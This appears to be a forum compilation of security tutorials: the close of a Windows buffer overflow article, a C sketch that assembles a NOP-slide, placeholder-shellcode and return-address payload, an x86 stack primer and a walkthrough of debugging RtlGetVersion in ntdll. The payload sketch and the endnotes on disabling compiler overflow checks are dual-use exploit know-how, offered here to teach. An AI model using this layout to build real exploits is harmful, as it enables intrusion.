Another prevention technique is to use compiler-based runtime bounds checking, which has recently become available; hopefully, with time, the buffer overflow problem will no longer be such a major headache for system administrators. While no security measure is perfect, avoiding programming errors is always the best solution.

[h=2]Summary[/h]

Of course, there are plenty of interesting buffer overflow issues which have not been discussed. Our intention was to demonstrate a concept and bring forth certain problems.
We hope that this paper will be a contribution to the improvement of the software development process quality through better understanding of the threat, and hence, providing better security to all of us. [h=2]References[/h] The links listed below form a small part of a huge number of references available on the World Wide Web. [1] Aleph One, Smashing The Stack For Fun and Profit, Phrack Magazine nr 49, http://www.phrack.org/show.php?p=49&a=14 [2] P. Fayolle, V. Glaume, A Buffer Overflow Study, Attacks & Defenses, http://www.enseirb.fr/~glaume/indexen.html [3] I. Simon, A Comparative Analysis of Methods of Defense against Buffer Overflow Attacks, http://www.mcs.csuhayward.edu/~simon/security/boflo.html [4] Bulba and Kil3r, Bypassing StackGuard and Stackshield, Phrack Magazine 56 No 5, http://phrack.infonexus.com/search.phtml?view&article=p56-5 [5] many interesting papers on Buffer Overflow and not only: http://www.nextgenss.com/research.html#papers [6] http://harmony.haxors.com/kungfoo [7] Avaya Business Communications Research & Development - Avaya Labs [8] www.securewave.com Endnotes: {1} In practice, certain code-optimizing compilers may operate without pushing EBP on the stack. The Visual C++ 7 Compiler uses it as a default option. To deactivate it, set: Project Properties | C/C++ | Optimization | Omit Frame Pointer for NO. {2} Microsoft has introduced a buffer overrun security tool in its Visual C++ 7. If you are intending to use the above examples to run in this environment, ensure that this option is not selected before compilation: Project Properties | C/C++ | Code Generation | Buffer Security Check should have the value NO. Sursa: Analysis of Buffer Overflow Attacks :: Windows OS Security :: Articles & Tutorials :: WindowSecurity.com
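Going back to the NOP-slide technique from the "Other ways of defining the beginning of the buffer" section above, here is a small, hedged C sketch of how such an input string is typically assembled: a run of 0x90 bytes, then the shellcode, then the guessed return address repeated enough times to cover the saved EIP slot. The sizes, the dummy shellcode bytes and the 0x0012fec0-style address are illustrative placeholders, not values taken from the article's listings.

#include <stdio.h>
#include <string.h>

int main(void)
{
    unsigned char payload[256];
    /* Placeholders: real shellcode and a guessed address inside the NOP slide. */
    const unsigned char shellcode[] = "\xcc\xcc\xcc";
    unsigned int guessed_ret = 0x0012fec0;      /* assumes a 32-bit little-endian target */

    size_t pos = 0;
    memset(payload, 0x90, 128);                 /* 1. the NOP slide            */
    pos = 128;
    memcpy(payload + pos, shellcode, sizeof(shellcode) - 1);  /* 2. the shellcode */
    pos += sizeof(shellcode) - 1;
    for (int i = 0; i < 8; i++) {               /* 3. repeated return address  */
        memcpy(payload + pos, &guessed_ret, 4);
        pos += 4;
    }

    fwrite(payload, 1, pos, stdout);            /* raw payload, to be fed to the victim */
    return 0;
}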
  24. [h=3]A required step to understand buffer overflow[/h]

This is not a buffer overflow exploit, but the required background that will help you understand how the CPU and memory "collaborate" with each other to execute a program. I have read many articles about 'buffer overflow'. Most of them start from a specific point, skipping over the basic knowledge one must have to deeply understand what is going on (behind the scenes). I wrote this article to cover (I hope) this gap. If at the end of this article you feel more comfortable with concepts like CALL, RETN and how a function is executed using memory (buffer, stack, etc.) then I will consider this article a successful one...

First, I would like to point out that everything we say is about the x86 processor family. In addition, most memory addresses are expressed in decimal notation (for the sake of clarity, for beginners) instead of the hexadecimal actually used by real-world software.

Requirements in order to read this article:
1. A basic understanding of assembly language.
2. A basic understanding of the C language.

Every process starts in computer memory (RAM – Random Access Memory) with three basic segments:
- Code Segment
- Data Segment (the well known BSS)
- Stack Segment

CODE SEGMENT
------------
In this memory segment "live" all the instructions of our program. Nobody... (nobody? well ok, almost nobody) can write to this memory segment, i.e. it is a read-only segment. For example, all the assembly instructions produced from the C code below are located in the code segment:

/* Set the 1st diagonal items to 1 otherwise 0 */
for (i = 0; i < 100; i++)
for (j = 0; j < 100; j++)
if (i != j)
a[i][j] = 0;
else
a[i][j] = 1;

PS: The remarks /*...*/ are not included in the code segment. The compiler does not produce code for the remarks.

DATA SEGMENT
------------
All initialized or uninitialized global variables are stored in this non-read-only (writable) segment. For example:

int i;
int j = 0;
int a[100][100];

STACK SEGMENT
-------------
All function variables, return addresses and function addresses are stored in this non-read-only memory. This segment is actually a stack data structure (for those who have attended a basic information technology course). This actually means that we put variables on a stack in memory. The last pushed variable is on the top of the stack, i.e. it is the first one available. The well-known LIFO (Last In First Out) data structure. The processor register ESP (Extended Stack Pointer) is used to keep the address of the current top element of the stack. On the stack we can put (PUSH) and get (POP) values. There are two important "secrets" here:

[1] PUSH and POP instructions operate in 4-byte units because of the 32-bit architecture of the x86 processor family.

[2] The stack grows downward; that is, if ESP=256, then just after a "PUSH EAX" instruction (with EAX = 34) ESP will become 252 and the value of EAX will be placed at address 252.

For example:

STACK
adrs memory
---- ------------------
256 | xy |
252 |    |
248 |    |
244 |    |
... .................
(ESP=256)

Instruction > PUSH EAX ; remark: suppose EAX = 34

STACK
256 | xy |
252 | 34 |
248 |    |
244 |    |
... .................
(ESP=252)

Instruction > POP EAX ; remark: Get the value from the stack into the EAX register

STACK
256 | xy |
252 | 34 |
248 |    |
244 |    |
... .................
(ESP=256)

Instruction > PUSH 15 ; remark: push the immediate value 15
Instruction > PUSH 16 ; remark: push the immediate value 16

STACK
256 | xy |
252 | 15 |
248 | 16 |
244 |    |
... .................
(ESP=248)

What is behind a function call
------------------------------
Before we explain what is behind it, we must say a few words about the EIP (Extended Instruction Pointer, or simply 'instruction pointer'). This register keeps the code segment address of the instruction that will be executed by the CPU. Every time the CPU executes an instruction, it stores into EIP the address of the instruction that follows the one currently executed. But how does the CPU find the address of the next instruction? Well... we have two cases here...

1. The address is immediately after the instruction currently executed.
2. There is a 'JMP' (a jump, e.g. a function call), so the instruction that needs to be executed next is at an address which is not next to the current one.

In case 1 the address is calculated by simply adding the length of the currently executed instruction to the current EIP value. Example: suppose we have the following 2 instructions at the addresses 100, 101

100 push EDX
101 mov ESP, 0

Suppose that at the starting point of our little program we have: EIP = 100
The CPU executes the instruction at address 100.
The CPU checks the instruction: is it a JUMP? No, so calculate its size. The CPU knows that the push instruction is 1 byte long. So... the new value of EIP = EIP + size(push EDX) => EIP = 100 + 1 => EIP = 101
So... the CPU executes the instruction at address 101, and so forth...

In case 2, we have a jump... things are a bit different. Just before we jump to another address (i.e. call a function), we must save the address of the next instruction somewhere, and just before returning from the function this saved address is written back into EIP. The CALL and RETN assembly instructions are used by the CPU to handle the above addresses:

The CALL is used to do 2 things:
1. To "remember" the next instruction that will be executed after the function returns (by pushing its address onto the stack), and
2. To write into EIP the address of the called function, i.e. to perform the function call.

The RETN instruction is executed at the end of the function: it pops (gets) the "return address" that CALL pushed onto the stack, so that execution continues after the end of the function.

The Base pointer (EBP)
----------------------
Each function in any program (even the main() function in C) has its own stack frame. A stack frame is a logical group of consecutive locations on the stack that keeps the variables and addresses for every function that is currently executed. Every address in the stack frame is a relative address. That means we address the locations of data on our stack relative to some reference point. And this reference point is EBP, which is the acronym for Extended Base Pointer. On function entry the old EBP (the caller's) is PUSHed onto the stack, the current ESP is copied into EBP, and from then on EBP is used to reference the local variables of the callee function relative to it. I hope the use of the base pointer will become clearer in the following example.

A REAL EXAMPLE C PROGRAM:

Consider the following C program:

void function1(int , int , int );

void main()
{
function1 (1, 2, 3);
}

void function1 (int a, int b, int c)
{
char z[4];
}

I compile/link the above program and use the Olly debugger to check the assembly code created. Skipping the operating system's instructions (which are 90% of the assembly code), the rest is the code that corresponds to our little program:

0040123C /. 55 PUSH EBP
0040123D |. 8BEC MOV EBP,ESP
0040123F |. 6A 03 PUSH 3 ; /Arg3 = 00000003
00401241 |. 6A 02 PUSH 2 ; |Arg2 = 00000002
00401243 |. 6A 01 PUSH 1 ; |Arg1 = 00000001
00401245 |. E8 05000000 CALL bo1.0040124F ; \bo1.0040124F
0040124A |. 83C4 0C ADD ESP,0C
0040124D |. 5D POP EBP
0040124E \. C3 RETN
0040124F /$ 55 PUSH EBP
00401250 |. 8BEC MOV EBP,ESP
00401252 |. 51 PUSH ECX
00401253 |. 59 POP ECX
00401254 |. 5D POP EBP
00401255 \. C3 RETN

ANALYSIS:
---------
The addresses from 0040123C to 0040124E correspond to the main() function. The addresses from 0040124F to 00401255 correspond to the function1() function.

0040123C /. 55 PUSH EBP

Backs up the old base pointer by pushing it onto the stack.

0040123D |. 8BEC MOV EBP,ESP

Copies the current stack pointer into the EBP register. From then on, inside the function, we'll reference the function's local variables through EBP. These two instructions are called the "Procedure Prologue". The stack holds the saved EBP value:

STACK
256 | [ebp] |
... .................
(ESP=256)

0040123F |. 6A 03 PUSH 3 ; /Arg3 = 00000003
00401241 |. 6A 02 PUSH 2 ; |Arg2 = 00000002
00401243 |. 6A 01 PUSH 1 ; |Arg1 = 00000001

Here we put the arguments onto the stack. The stack is:

STACK
256 | [ebp] |
252 | 3 |
248 | 2 |
244 | 1 |
... .................
(ESP=244)

00401245 |. E8 05000000 CALL bo1.0040124F ; \bo1.0040124F

Calls the function at address 0040124F. bo1 is the name of my executable. The stack becomes:

STACK
256 | [ebp] |
252 | 3 |
248 | 2 |
244 | 1 |
240 | 0040124A | <- the return address used when function1 ends.
... .................
(ESP=240)

Let's follow the execution, so go to address 0040124F (function1):

0040124F /$ 55 PUSH EBP
00401250 |. 8BEC MOV EBP,ESP

Hmm... this is the "Procedure Prologue" again (remember, this must be executed in every function). It sets up the function's own stack frame. The EBP register is currently pointing at a location in main's stack frame. This value must be preserved, so EBP is pushed onto the stack. Then the contents of ESP are transferred to EBP. This allows the arguments to be referenced as an offset from EBP and frees up the stack register ESP to do other things. The stack now is:

STACK
256 | [ebp] |
252 | 3 |
248 | 2 |
244 | 1 |
240 | 0040124A | <- the return address used when function1 ends.
236 | <main's EBP> | <- Note that ESP=EBP indicates this address.
... .................
(ESP=236)

00401252 |. 51 PUSH ECX
00401253 |. 59 POP ECX
00401254 |. 5D POP EBP

The PUSH ECX / POP ECX pair cancels out (it effectively reserves and then releases 4 bytes for the local buffer z), and POP EBP restores main's EBP. After these instructions the stack becomes:

STACK
256 | [ebp] |
252 | 3 |
248 | 2 |
244 | 1 |
240 | 0040124A |
... .................
(ESP=240)

00401255 \. C3 RETN

The function ends and returns to 0040124A (remember our definition of the RETN instruction); the return address is popped, so ESP becomes 244.

0040124A |. 83C4 0C ADD ESP,0C

After the function has returned, we add 12 (0C in hex) to the stack pointer, since we pushed 3 arguments onto the stack, each occupying 4 bytes (integers). By increasing ESP we are actually shrinking the stack (remember that we fill the stack downwards, from high to low memory addresses), i.e. ESP = 244 + 12 = 256.

STACK
256 | [ebp] |
... .................
(ESP=256)

Thus, ESP has the value it had at the first step of the program's execution, before the function call. I hope that you now have a basic understanding of the use of the stack and the stack pointer. In another article I will describe how nasty things can happen here. Hint: how about overwriting the stack item (at address 240 in our example above), i.e. overwriting the value that will end up in the Instruction Pointer (EIP)... I suggest you try my little program, or better, create your own and test, check, review, test, check, review, test, check, review!! Happy Programming Guys!!
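As a small experiment in the spirit of the walkthrough above, the sketch below prints where the local buffer, an argument and the saved return address live. It assumes GCC or Clang (for __builtin_return_address) and is not part of the original article; the exact addresses differ on every run because of ASLR, but their relative placement on the stack is what matters.

#include <stdio.h>

void function1(int a, int b, int c)
{
    char z[4];

    printf("local buffer z      : %p\n", (void *)z);
    printf("argument a          : %p\n", (void *)&a);
    printf("saved return address: %p\n", __builtin_return_address(0));
    (void)b; (void)c;
}

int main(void)
{
    function1(1, 2, 3);
    return 0;
}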
References: [1] BUFFER OVERFLOWS DEMYSTIFIED by murat@enderunix.org [2] C Function Call Conventions and the Stack (UMBC CMSC 313, Computer Organization & Assembly Language, Spring 2002, Section 0101) [3] The Assembly Language Book for IBM PC by Peter Norton (ISBN 960-209-028-6) [4] Analysis of Buffer Overflow Attacks from Analysis of Buffer Overflow Attacks :: Windows OS Security :: Articles & Tutorials :: WindowSecurity.com [5] 8088 8086 Programming and Applications for IBM PC/XT & Compatibles by Nikos Nasoufis Posted by Andreas Venieris at 7:49 PM Sursa: 0x191 Unauthorized: A required step to understand buffer overflow
  25. [h=3]Debugging the Native Windows API[/h]

We are going to play a little game. We will search inside the Native Windows Application Programming Interface (API) for functions that are used internally by the Windows 7 operating system. The use of such functions is not suggested by Microsoft. We are not only going to uncover such functions, but we will also use them and examine their results. The Native API sits behind the Base API that Microsoft suggests using for compatibility and portability reasons. The Native API is the last layer (in user mode) that performs direct calls into Windows kernel mode, more specifically into NTOSKRNL.EXE, which is the core Windows kernel.

I must say that, in my opinion, examining the Windows API is not the easiest thing. I could say that it is more difficult than in Linux, since the Windows source is not available; it is closed source. How, then, is it possible to study a specific API function? Only disassembly code can be extracted from modules that do not belong to the core kernel. In case we want to debug the kernel, we will need special programs (a Windows kernel debugger, for example), but this is beyond the scope of this article. We will look, from a user-mode point of view, at the procedures and functions (even undocumented ones) inside the Native API, aka ntdll.dll.

A question one might ask is: but why do we do this? Hmm... there is more than one reason:
1. It is a very good elementary lesson for wannabe operating system reversers.
2. We will learn how to administer our operating system's basic internal actions.
3. We will see live the operation of the (somewhat) cryptic native Windows API.

What knowledge is required to read this article? Well, not deep.
1. Elementary knowledge of some reversing techniques, for example how to use the Olly debugger.
2. Little (yes, little!) knowledge of assembly. We will inevitably meet a lot of assembly code on our trip, but I am not willing to turn this article into an assembly listing with explanations! We will see how to achieve our goals without the need to be an assembly programmer.

Let's start! The Native API is implemented inside ntdll.dll, which is located in c:\windows\system32. For the sake of safety let's copy this DLL to a work directory, say d:\work2. Every test presented here is performed on a box with Windows 7 Ultimate 64-bit. What I am going to do now is extract every single function that this DLL contains and (randomly...?) choose one to examine. In order to extract all the exported functions of ntdll.dll I will use the program dumpbin that comes with Visual Studio 2008. I enter:

D:\work2> dumpbin ntdll.dll /exports > exports.txt

and I create (through redirection) the file exports.txt that contains all the functions that ntdll.dll exports. When I open it (using UltraEdit) I see the following:

Image 1: Exported functions of ntdll.dll

Looking inside this file I found this:

ordinal hint RVA name
933 398 0003859A RtlGetVersion

Hmm... there is a function named RtlGetVersion that is located at RVA (Relative Virtual Address) 0003859A. The RVA is the relative address at which the RtlGetVersion function will be found once the DLL is loaded into memory and thus gets a base address. If, for example, the RVA of a function is 15 and the DLL is loaded at position 100, then the function will be located at address 115. I would like to see what this function does. So, I will disassemble it.
To do this I have to disassemble the whole ntdll as follows: D:\work2>dumpbin /disasm ntdll.dll > ntdlldisasm.txt The file ntdlldisasm.txt that I create contains the whole assembly code of ntdll. Its a small source file of... 17Mb! Now, I have to search in this file for my RtlGetVersion function. This is easy. I just have to apply the rule: IMAGE_BASE_ADDRESS + Function_RVA = Function Address I already have the RVA. its 0003859A. But what is the IMAGE_BASE_ADDRESS of ntdll? This is easy too. I just enter: D:\work2>dumpbin /headers ntdll.dll | find "image base" 7DE70000 image base (7DE70000 to 7DFEFFFF) So 7DE70000 + 0003859A = 7DEA859A. which means that my function RtlGetVersion located at address 7DEA859A. Image 2: the ntdll.dll disassembly code The actual code of RtlGetVersion is the following: 7DEA859A: 8B FF mov edi,edi 7DEA859C: 55 push ebp 7DEA859D: 8B EC mov ebp,esp 7DEA859F: 51 push ecx 7DEA85A0: 64 A1 18 00 00 00 mov eax,dword ptr fs:[00000018h] 7DEA85A6: 53 push ebx 7DEA85A7: 56 push esi 7DEA85A8: 8B 75 08 mov esi,dword ptr [ebp+8] 7DEA85AB: 57 push edi 7DEA85AC: 8B 78 30 mov edi,dword ptr [eax+30h] 7DEA85AF: 8B 87 A4 00 00 00 mov eax,dword ptr [edi+000000A4h] 7DEA85B5: 89 46 04 mov dword ptr [esi+4],eax 7DEA85B8: 8B 87 A8 00 00 00 mov eax,dword ptr [edi+000000A8h] 7DEA85BE: 89 46 08 mov dword ptr [esi+8],eax 7DEA85C1: 0F B7 87 AC 00 00 movzx eax,word ptr [edi+000000ACh] 00 7DEA85C8: 89 46 0C mov dword ptr [esi+0Ch],eax 7DEA85CB: 8B 87 B0 00 00 00 mov eax,dword ptr [edi+000000B0h] 7DEA85D1: 89 46 10 mov dword ptr [esi+10h],eax 7DEA85D4: 8B 87 F4 01 00 00 mov eax,dword ptr [edi+000001F4h] 7DEA85DA: 85 C0 test eax,eax 7DEA85DC: 74 0A je 7DEA85E8 7DEA85DE: 66 83 38 00 cmp word ptr [eax],0 7DEA85E2: 0F 85 BB 78 05 00 jne 7DEFFEA3 7DEA85E8: 33 C0 xor eax,eax 7DEA85EA: 66 89 46 14 mov word ptr [esi+14h],ax 7DEA85EE: 81 3E 1C 01 00 00 cmp dword ptr [esi],11Ch 7DEA85F4: 75 5E jne 7DEA8654 7DEA85F6: 66 0F B6 87 AF 00 movzx ax,byte ptr [edi+000000AFh] 00 00 7DEA85FE: 66 89 86 14 01 00 mov word ptr [esi+00000114h],ax 00 7DEA8605: 66 8B 87 AE 00 00 mov ax,word ptr [edi+000000AEh] 00 7DEA860C: B9 FF 00 00 00 mov ecx,0FFh 7DEA8611: 66 23 C1 and ax,cx 7DEA8614: 66 89 86 16 01 00 mov word ptr [esi+00000116h],ax 00 7DEA861B: 66 A1 D0 02 FE 7F mov ax,word ptr ds:[7FFE02D0h] 7DEA8621: 66 89 86 18 01 00 mov word ptr [esi+00000118h],ax 00 7DEA8628: 8D 45 FC lea eax,[ebp-4] 7DEA862B: 8D BE 1A 01 00 00 lea edi,[esi+0000011Ah] 7DEA8631: 50 push eax 7DEA8632: C6 07 00 mov byte ptr [edi],0 7DEA8635: E8 28 00 00 00 call 7DEA8662 7DEA863A: 84 C0 test al,al 7DEA863C: 74 16 je 7DEA8654 7DEA863E: 8B 45 FC mov eax,dword line ptr [ebp-4] 7DEA8641: 88 07 mov byte ptr [edi],al 7DEA8643: 83 F8 01 cmp eax,1 7DEA8646: 75 0C jne 7DEA8654 7DEA8648: B8 EF FF 00 00 mov eax,0FFEFh 7DEA864D: 66 21 86 18 01 00 and word ptr [esi+00000118h],ax 00 7DEA8654: 5F pop edi 7DEA8655: 5E pop esi 7DEA8656: 33 C0 xor eax,eax 7DEA8658: 5B pop ebx 7DEA8659: C9 leave 7DEA865A: C2 04 00 ret 4 I present this code just for the shake of knowledge and I am not to go in a line by line explanation as I promised. I am going to do something more practical: I will execute the above code using Olly debugger and I will examine the results. Ok, it sounds interesting, but how can I call the specific function that is inside a DLL? With Olly this is easy. Before I start, I want to check the documentation of this function. Indeed here is the documentation that microsoft provides. 
The RtlGetVersion routine returns version information about the currently running operating system.

Syntax

NTSTATUS RtlGetVersion(
  __out PRTL_OSVERSIONINFOW lpVersionInformation
);

Parameters

lpVersionInformation [out]
Pointer to either a RTL_OSVERSIONINFOW structure or a RTL_OSVERSIONINFOEXW structure that contains the version information about the currently running operating system. A caller specifies which input structure is used by setting the dwOSVersionInfoSize member of the structure to the size in bytes of the structure that is used.

Return Value

RtlGetVersion returns STATUS_SUCCESS.

Remarks

RtlGetVersion is the kernel-mode equivalent of the user-mode GetVersionEx function in the Windows SDK. See the example in the Windows SDK that shows how to get the system version.

As we can see, this function takes no input values; once called, it returns its results in the RTL_OSVERSIONINFOW structure pointed to by its single (output) argument. The definition of this structure is here:

dwOSVersionInfoSize: Specifies the size in bytes of an RTL_OSVERSIONINFOW structure. This member must be set before the structure is used with RtlGetVersion.
dwMajorVersion: Identifies the major version number of the operating system. For example, for Windows 2000, the major version number is five.
dwMinorVersion: Identifies the minor version number of the operating system. For example, for Windows 2000 the minor version number is zero.
dwBuildNumber: Identifies the build number of the operating system.
dwPlatformId: Identifies the operating system platform. For Microsoft Win32 on NT-based operating systems, RtlGetVersion returns the value VER_PLATFORM_WIN32_NT.
szCSDVersion: Contains a null-terminated string, such as "Service Pack 3", which indicates the latest Service Pack installed on the system. If no Service Pack has been installed, the string is empty.

OK, now I know what to expect as a result: the structure RTL_OSVERSIONINFOW. Now I return to my initial goal: to execute the function via Olly. Because we are talking about a DLL (and not about an executable) I will do the following: after loading the DLL in Olly, I will go to the address where my function is located and set a new origin there, as you can see in the next image.

Image 3: The new origin point is the address of RtlGetVersion.

Note that the address of RtlGetVersion is not the same as the one I got from the dumpbin output. This is not odd; it is explained by the fact that the base address is different in each case. After setting my new origin, I put a breakpoint at address 776D859A. I am now ready to press Run to hit this breakpoint, and then I will step line by line (by pressing F10), examining the function's execution and the register values. In addition, to check the results in a more reliable way, I will run the "winver" system command from the command line and compare the values it reports (according to the Microsoft documentation). The winver command gives me the following:

Image 4: The output of the winver command.

Note the string "Version 6.1 (Build 7600)". I should see the same result after executing the function RtlGetVersion. Below is an analysis of the code as Olly shows it, with my remarks about the register values I observe. I hope the remarks are descriptive enough that no further explanation is necessary.
776D859A > 8BFF             MOV EDI,EDI                   |
776D859C   55               PUSH EBP                      | Standard function prologue
776D859D   8BEC             MOV EBP,ESP                   |
776D859F   51               PUSH ECX
776D85A0   64:A1 18000000   MOV EAX,DWORD PTR FS:[18]     ====>> EAX = the TEB (Thread Environment Block) address
776D85A6   53               PUSH EBX
776D85A7   56               PUSH ESI
776D85A8   8B75 08          MOV ESI,DWORD PTR SS:[EBP+8]  ====>> ESI = the function's argument, the caller's RTL_OSVERSIONINFOW structure
776D85AB   57               PUSH EDI
776D85AC   8B78 30          MOV EDI,DWORD PTR DS:[EAX+30] ====>> EDI = the PEB (Process Environment Block) address, taken from TEB+30h
776D85AF   8B87 A4000000    MOV EAX,DWORD PTR DS:[EDI+A4] ===>> eax=6 (MajorVersion)
776D85B5   8946 04          MOV DWORD PTR DS:[ESI+4],EAX
776D85B8   8B87 A8000000    MOV EAX,DWORD PTR DS:[EDI+A8] ===>> eax=1 (MinorVersion)
776D85BE   8946 08          MOV DWORD PTR DS:[ESI+8],EAX
776D85C1   0FB787 AC000000  MOVZX EAX,WORD PTR DS:[EDI+AC] ===>> eax=00001DB0, i.e. 7600 (BuildNumber); MOVZX = MOV with Zero eXtend
776D85C8   8946 0C          MOV DWORD PTR DS:[ESI+C],EAX
776D85CB   8B87 B0000000    MOV EAX,DWORD PTR DS:[EDI+B0] ===>> eax=2 (PlatformId)
776D85D1   8946 10          MOV DWORD PTR DS:[ESI+10],EAX
776D85D4   8B87 F4010000    MOV EAX,DWORD PTR DS:[EDI+1F4]
776D85DA   85C0             TEST EAX,EAX
776D85DC   74 0A            JE SHORT ntdll.776D85E8
776D85DE   66:8338 00       CMP WORD PTR DS:[EAX],0
776D85E2   0F85 BB780500    JNZ ntdll.7772FEA3
776D85E8   33C0             XOR EAX,EAX
776D85EA   66:8946 14       MOV WORD PTR DS:[ESI+14],AX
776D85EE   813E 1C010000    CMP DWORD PTR DS:[ESI],11C
776D85F4   75 5E            JNZ SHORT ntdll.776D8654
776D85F6   66:0FB687 AF0000>MOVZX AX,BYTE PTR DS:[EDI+AF]
776D85FE   66:8986 14010000 MOV WORD PTR DS:[ESI+114],AX
776D8605   66:8B87 AE000000 MOV AX,WORD PTR DS:[EDI+AE]
776D860C   B9 FF000000      MOV ECX,0FF
776D8611   66:23C1          AND AX,CX
776D8614   66:8986 16010000 MOV WORD PTR DS:[ESI+116],AX
776D861B   66:A1 D002FE7F   MOV AX,WORD PTR DS:[7FFE02D0]
776D8621   66:8986 18010000 MOV WORD PTR DS:[ESI+118],AX
776D8628   8D45 FC          LEA EAX,DWORD PTR SS:[EBP-4]
776D862B   8DBE 1A010000    LEA EDI,DWORD PTR DS:[ESI+11A]
776D8631   50               PUSH EAX
776D8632   C607 00          MOV BYTE PTR DS:[EDI],0
776D8635   E8 28000000      CALL ntdll.RtlGetNtProductType
776D863A   84C0             TEST AL,AL
776D863C   74 16            JE SHORT ntdll.776D8654
776D863E   8B45 FC          MOV EAX,DWORD PTR SS:[EBP-4]
776D8641   8807             MOV BYTE PTR DS:[EDI],AL
776D8643   83F8 01          CMP EAX,1
776D8646   75 0C            JNZ SHORT ntdll.776D8654
776D8648   B8 EFFF0000      MOV EAX,0FFEF
776D864D   66:2186 18010000 AND WORD PTR DS:[ESI+118],AX
776D8654   5F               POP EDI
776D8655   5E               POP ESI
776D8656   33C0             XOR EAX,EAX
776D8658   5B               POP EBX
776D8659   C9               LEAVE
776D865A   C2 0400          RETN 4

Very well. As you can see, I get the same results. There is one more thing I would like to point out: pay attention to address 776D8635. At this address another function is called: RtlGetNtProductType. This function is probably internal and... undocumented. We will discuss undocumented functions further in a later article...

So far we have achieved the following:
1. We saw which functions exist inside ntdll.dll.
2. We selected and examined one of them.
3. We executed it and followed its results line by line by examining its (disassembled) code.

Be careful when you mess around with Native API functions. If something goes wrong, it is quite possible to freeze your system.

REMARK: Until now we have examined functions with the 'Rtl' prefix. Microsoft chose this naming convention for its internal functions; Rtl means RunTime Library. In addition, inside ntdll we will see another prefix: Zw. Functions with this prefix make direct calls to the kernel.
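As a side note, the listing above shows that on this system RtlGetVersion does little more than copy a few fields out of the PEB (reached via fs:[18h], the TEB, and then TEB+30h, the PEB): the major version at offset A4h, the minor version at A8h, the build number at ACh and the platform id at B0h. Just to illustrate that, here is a small C sketch of mine (not from the original article) that reads the same PEB fields directly with the MSVC __readfsdword intrinsic. The offsets are the ones observed in this 32-bit Windows 7 listing; they are undocumented and version specific, so treat this purely as an illustration of what the disassembly does, and compile it as a 32-bit (x86) binary.

/* peb_version.c : illustration only, not part of the original article.
   x86 build only; offsets A4h/A8h/ACh/B0h were observed on 32-bit
   Windows 7 and are not guaranteed on other Windows versions. */
#include <windows.h>
#include <intrin.h>
#include <stdio.h>

int main(void)
{
    /* fs:[30h] holds the PEB pointer on x86; the listing gets there
       via fs:[18h] (the TEB) and then [TEB+30h]. */
    unsigned char *peb = (unsigned char *)__readfsdword(0x30);

    DWORD major = *(DWORD *)(peb + 0xA4); /* [EDI+A4] in the listing */
    DWORD minor = *(DWORD *)(peb + 0xA8); /* [EDI+A8] */
    WORD  build = *(WORD  *)(peb + 0xAC); /* MOVZX from [EDI+AC]     */
    DWORD plat  = *(DWORD *)(peb + 0xB0); /* [EDI+B0] */

    /* On the box used in the article this should match winver:
       "Version 6.1 (Build 7600)", platform id 2. */
    printf("Version %lu.%lu (Build %u), platform id %lu\n",
           (unsigned long)major, (unsigned long)minor,
           (unsigned int)build, (unsigned long)plat);
    return 0;
}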
In general, you should know that the naming convention used by Microsoft follows the formula:

<Prefix><Operation><Object>

What remains to be done is a program in the C language that calls this function directly from the Native API. Such a program could be used as a base for more advanced... checks, even using undocumented functions. If you search the internet you will not find many examples of how to call RtlGetVersion directly from the Native API, so I suppose this code can add a small brick to cover that gap. The program is written in C++ with Visual Studio 2010.

///////////////////////////////////////////////////////////////////////
// Kernel01.cpp : Call the RtlGetVersion from native API
// © by Thiseas 2011 for www.p0wnbox.com
//
#include "stdafx.h"
#include <Windows.h>
#include <stdio.h>

// RtlGetVersion takes a single out parameter and returns an NTSTATUS (a LONG), see
// http://www.osronline.com/ddkx/kmarch/k109_452q.htm
typedef LONG (WINAPI *pwinapi)(PRTL_OSVERSIONINFOW);

int _tmain(int argc, _TCHAR* argv[])
{
	RTL_OSVERSIONINFOW info;
	pwinapi p_pwinapi;

	ZeroMemory(&info, sizeof(RTL_OSVERSIONINFOW));
	// The documentation requires dwOSVersionInfoSize to be set
	// before the structure is passed to RtlGetVersion.
	info.dwOSVersionInfoSize = sizeof(RTL_OSVERSIONINFOW);

	p_pwinapi = (pwinapi) GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "RtlGetVersion");
	if (p_pwinapi == NULL)
		return(1);

	p_pwinapi(&info);

	// Should print "6.1 build 7600" on the box used in this article.
	printf("%lu.%lu build %lu\n", info.dwMajorVersion, info.dwMinorVersion, info.dwBuildNumber);
	return(0);
}

There is no need to spend more bytes on comments; please try it by yourself... Debug and disassemble this little program and repeat the procedure we just described above. I promise you that you will be disappointed...

Happy Reversing!

Posted by Andreas Venieris at 12:50 AM

Source: 0x191 Unauthorized: Debugging the Native Windows API